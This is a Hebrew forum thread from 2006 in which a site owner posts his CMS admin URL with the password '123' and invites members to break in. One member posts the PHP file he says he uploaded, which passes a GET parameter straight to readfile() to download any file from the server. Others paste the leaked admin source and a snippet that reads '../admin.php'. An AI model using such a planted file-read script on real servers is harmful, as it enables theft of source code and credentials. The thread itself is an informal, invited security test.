הרשם שאלות ותשובות רשימת חברים לוח שנה חיפוש הודעות מהיום סמן פורומים כנקראו

   
|!|

השב
 
כלים לאשכול תצורת הצגה
ישן 05-07-06, 11:16   # 1
x-ray
דוגמן הבית השמן
תודה על תרומתך :)
 
מיני פרופיל
תאריך הצטרפות: Oct 2005
גיל: 36
הודעות: 3,716

x-ray לא מחובר  

בדיקות אבטחה..

בהמשך לאשכול הקודם(http://www.hosts.co.il/forums/showthread.php?t=25673) על הקוד שלקחו לי החלטתי לפרסם את הכתובת למערכת פה,
מי שמצלי לפרוץ או להוריד משהו למחשב שו שיגיד לי איך לעזאזל עושים דבר כזה ואיך מונעים את זה!

http://www.d-arena.com/bla/admin.php
סיסמא 123
__________________
בברכה,
עידן בן אור
  Reply With Quote
ישן 05-07-06, 12:33   # 2
lalamen
חבר פורום
 
מיני פרופיל
תאריך הצטרפות: Oct 2005
גיל: 34
הודעות: 328

lalamen לא מחובר  

פרצתי לך את המערכת בשניות ואני יודע את השם של המסד

arena_cms

וגם את הסיסמא
  Reply With Quote
ישן 05-07-06, 12:44   # 3
x-ray
דוגמן הבית השמן
תודה על תרומתך :)
 
מיני פרופיל
תאריך הצטרפות: Oct 2005
גיל: 36
הודעות: 3,716

x-ray לא מחובר  

מה?
איך עשית את זה?
אפשר לדבר איתך בפרטי?
__________________
בברכה,
עידן בן אור
  Reply With Quote
ישן 05-07-06, 12:46   # 4
lalamen
חבר פורום
 
מיני פרופיל
תאריך הצטרפות: Oct 2005
גיל: 34
הודעות: 328

lalamen לא מחובר  

העליתי קובץ עם הקוד הבא:

PHP קוד:
<?php
$file 
$_GET['file'];
header ("Content-type: application/x-php");
header ("Content-disposition: attachment; filename=".$file.";");
header("Content-Length: ".filesize($file));
readfile($file);
exit;
?>
  Reply With Quote
ישן 05-07-06, 12:48   # 5
x-ray
דוגמן הבית השמן
תודה על תרומתך :)
 
מיני פרופיל
תאריך הצטרפות: Oct 2005
גיל: 36
הודעות: 3,716

x-ray לא מחובר  

ציטוט:
נכתב במקור על ידי lalamen
העליתי קובץ עם הקוד הבא:

PHP קוד:
<?php
$file 
$_GET['file'];
header ("Content-type: application/x-php");
header ("Content-disposition: attachment; filename=".$file.";");
header("Content-Length: ".filesize($file));
readfile($file);
exit;
?>
אהה זה היה לפני שחסמתי העלאת קבציםשל PHP...עכשיו זה חסום כבר..תנסה שוב אני אל חושב שתצליח..

---ערכיה---

מי שעדיין מצליח להעלות קבצי PHP זה כי הוא עדיין מופנה לDNS הישן...
אני לא יכול לשנות שם כבר את הקבצים אין יל גישה יותר.
__________________
בברכה,
עידן בן אור
  Reply With Quote
ישן 05-07-06, 13:03   # 6
CSite.co.il
משתמש - היכל התהילה
 
מיני פרופיל
תאריך הצטרפות: Oct 2005
הודעות: 1,816

CSite.co.il לא מחובר  

הנה עוד חלק מהקוד שלך:
PHP קוד:
<?php

$file 
"../admin.php";

$file file_get_contents($file);

echo 
htmlspecialchars($file);

?>
  Reply With Quote
ישן 05-07-06, 13:07   # 7
Eye-Soft
Permanently Banned
 
מיני פרופיל
תאריך הצטרפות: Oct 2005
הודעות: 1,158

Eye-Soft לא מחובר  

<?php ob_start(); ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1255" />
<title>פאנל ניהול פלייבקים</title>
<style type="text/css">
<!--
input {
border: 1px solid black; font-family: Arial;color:black; background-color: white;
}
body,table {
font-family: Arial, Helvetica, sans-serif;

color: #000000;
text-decoration: none;

}

-->
</style>


<script language=JavaScript>
function openWin(my_var) {
window.open(my_var,'CatDelete','menubar=no,resizab le=no,scrollbars=yes,width=600,height=400');
}
</script>


</head>

<body>
<br><br>
<center><font size="3">
<table dir="rtl" width="100%"><tr bgcolor="#F0F0F0"><td><a href="admin.php">ניהול ראשי</a> | <a href="javascript: openWin('admin.php?act=add')">הוסף פלייבק</a> | <a href="javascript: openWin('admin.php?act=search')">חפש פלייבק</a> | <a href="admin.php?act=showheb">הצג קטגוריה עברי</a> | <a href="admin.php?act=showen">הצג קטגוריה לועזי</a></td></tr></table></font>

<?php


session_start();
if($_SESSION['admin']=='true'){
include 'db.php';
$act=$_GET['act'];
switch($act) {
case "view":
include 'act/view.php';
break;
case "add":
include 'act/add.php';
break;
case "showheb":
include 'act/showheb.php';
break;
case "showen":
include 'act/showen.php';
break;
case "deletesong":
include 'act/deletesong.php';
break;
case "search":
include 'act/search.php';
break;
case "editsong":
include 'act/editsong.php';
break;
case "mail":
include 'act/mail.php';
break;
default:
header("Location: admin.php?act=view");
break;

}
}else header('Location: login.php');
?>
</center>
</body>
</html>

תעשה לי טובה, תגיד לי שאתה לא מרוויח כסף מתיכנות, כי זה רוע ללקוחות.
  Reply With Quote
ישן 05-07-06, 13:07   # 8
TheShark
Permanently Banned
 
מיני פרופיל
תאריך הצטרפות: Feb 2006
מיקום: חדרה
הודעות: 1,156
שלח הודעה באמצעות ICO אל TheShark שלח הודעה באמצעות MSN אל TheShark

TheShark לא מחובר  

ציטוט:
נכתב במקור על ידי lalamen
העליתי קובץ עם הקוד הבא:

PHP קוד:
<?php
$file 
$_GET['file'];
header ("Content-type: application/x-php");
header ("Content-disposition: attachment; filename=".$file.";");
header("Content-Length: ".filesize($file));
readfile($file);
exit;
?>

אפשר לשאול שאלה?
אז העלת את הקובץ הזה לשרת שלו...

מה עכשיו אתה עושה אחרי שהעלת את הקובץ?
אתה נכנס לאיו דרך הכתובת ואז מה קורה?
אשמח אם תענה לי בפה או בפרטי... בבקשה

יום טוב.
  Reply With Quote
ישן 05-07-06, 13:09   # 9
x-ray
דוגמן הבית השמן
תודה על תרומתך :)
 
מיני פרופיל
תאריך הצטרפות: Oct 2005
גיל: 36
הודעות: 3,716

x-ray לא מחובר  

ציטוט:
נכתב במקור על ידי Eye-Soft
<?php ob_start(); ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1255" />
<title>פאנל ניהול פלייבקים</title>
<style type="text/css">
<!--
input {
border: 1px solid black; font-family: Arial;color:black; background-color: white;
}
body,table {
font-family: Arial, Helvetica, sans-serif;

אני אומר לך שוב,אם אתה מצליח להעלות קבצי PHP לשרת זה רק כי לא התעדכן לך הDNS ולשרת השני כבר אין לי גישה.

color: #000000;
text-decoration: none;

}

-->
</style>


<script language=JavaScript>
function openWin(my_var) {
window.open(my_var,'CatDelete','menubar=no,resizab le=no,scrollbars=yes,width=600,height=400');
}
</script>


</head>

<body>
<br><br>
<center><font size="3">
<table dir="rtl" width="100%"><tr bgcolor="#F0F0F0"><td><a href="admin.php">ניהול ראשי</a> | <a href="javascript: openWin('admin.php?act=add')">הוסף פלייבק</a> | <a href="javascript: openWin('admin.php?act=search')">חפש פלייבק</a> | <a href="admin.php?act=showheb">הצג קטגוריה עברי</a> | <a href="admin.php?act=showen">הצג קטגוריה לועזי</a></td></tr></table></font>

<?php


session_start();
if($_SESSION['admin']=='true'){
include 'db.php';
$act=$_GET['act'];
switch($act) {
case "view":
include 'act/view.php';
break;
case "add":
include 'act/add.php';
break;
case "showheb":
include 'act/showheb.php';
break;
case "showen":
include 'act/showen.php';
break;
case "deletesong":
include 'act/deletesong.php';
break;
case "search":
include 'act/search.php';
break;
case "editsong":
include 'act/editsong.php';
break;
case "mail":
include 'act/mail.php';
break;
default:
header("Location: admin.php?act=view");
break;

}
}else header('Location: login.php');
?>
</center>
</body>
</html>

תעשה לי טובה, תגיד לי שאתה לא מרוויח כסף מתיכנות, כי זה רוע ללקוחות.
אני אומר לך שוב,אם אצלחת להעלות קובץ PHP זה רק כי לא התעדכן לך הDNS עדיין ואין לי גישה לשרת השני לחסום של העלאת קבצי PHP.

אם הצלחת בדרך אחרת אני אשמח לדעת איך.
__________________
בברכה,
עידן בן אור
  Reply With Quote
ישן 05-07-06, 13:10   # 10
Eye-Soft
Permanently Banned
 
מיני פרופיל
תאריך הצטרפות: Oct 2005
הודעות: 1,158

Eye-Soft לא מחובר  

לא העלתי שום קובץ. המערכת שלך היא אחת המערכות הפריצות והבנויית בצורה הטיפשית שראיתי :\
עניתי לך על איך באשכול הקודם...
  Reply With Quote
השב

חברים פעילים הצופים באשכול זה: 1 (0 חברים ו- 1 אורחים)
 

כלים לאשכול
תצורת הצגה

חוקי פירסום
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is מופעל
סמיילים הם מופעל
[IMG] קוד מופעל
קוד HTML מכובה

קפיצה לפורום


כל הזמנים הם GMT +2. הזמן כעת הוא 05:43.

מופעל באמצעות VBulletin גרסה 3.8.6
כל הזכויות שמורות ©
כל הזכויות שמורות לסולל יבוא ורשתות (1997) בע"מ